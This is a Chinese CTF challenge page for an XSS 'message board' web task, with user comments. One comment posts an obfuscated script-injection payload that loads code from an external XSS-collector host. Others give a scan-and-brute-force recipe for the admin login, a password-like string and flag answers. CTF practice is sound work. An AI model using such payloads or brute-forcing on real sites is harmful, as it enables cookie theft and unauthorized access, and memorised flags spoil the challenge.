留言板WEB 未解决

分数: 10 金币: 3
题目作者: harry
一  血: ꧁༺༽༾ཊ彪ཏ༿༼༻꧂
一血奖励: 5金币
解  决: 2961
提  示: 题目无需登录后台!需要xss平台接收flag
描  述:
http协议需要http协议的xss平台
...
登录回复
评论
dzss 1年前
举报

db.sql怎么链接不上

回复 1
dzss 1年前
举报

这个密码怎么得出来的 admin 011be4d65feac1a8

回复 0
lwq522725 1年前
举报

sCRiPt/SrC=//i0.al/Logugk>

回复 0
qixi 1年前
举报

直接放入xss平台地址留言就行了

回复 0
Jaylon 1年前
举报

来个xss平台

回复 0
popoh 1年前
举报

db.sql压根就没有

回复 5
songci 1年前
举报

flag{750d33e925f6dbf1784a1a924c237534}

回复 0
19881191586 1年前
举报

第一步:用御剑或dirsearch扫描后台,发现index.php和admin.php 第二步:用工具爆破admin的登录密码 第三步:进入admin页面,刷新页面,弹出提示,提示里面出现URL编码后的flag 第四步:URL解码

回复 3
treasure11 1年前
举报

....太难了

回复 0
mAns0nw0W 1年前
举报

flag{0d25978069e52fed99591c5c19ca0663}

回复 0
APTX4869ZRC 1年前
举报

BugKu真的很酷

回复 0

WriteUp

image
丶我亚索贼六

5 金币

立即查看

评分(17)

解题动态

a1451753998 攻破了该题 2天前
3320981239 攻破了该题 3天前
zengzhijing 攻破了该题 5天前
没有绝对的安全系统 攻破了该题 5天前
DigitalLemon 攻破了该题 10天前
不吃鸭蛋 攻破了该题 10天前
flagshiwodie 攻破了该题 10天前
ww__ 攻破了该题 10天前
huihuiwudi 攻破了该题 11天前
huihuiwudi321 攻破了该题 11天前
hackerbugku 攻破了该题 13天前
李欣 攻破了该题 14天前
网络安全亮 攻破了该题 16天前
西红柿炒番茄 攻破了该题 16天前
yiwuxiaobawang 攻破了该题 17天前
xiayuan 攻破了该题 18天前
xky110 攻破了该题 18天前
dengsf2025 攻破了该题 18天前
huaxinxin 攻破了该题 18天前
cs888 攻破了该题 19天前
问题反馈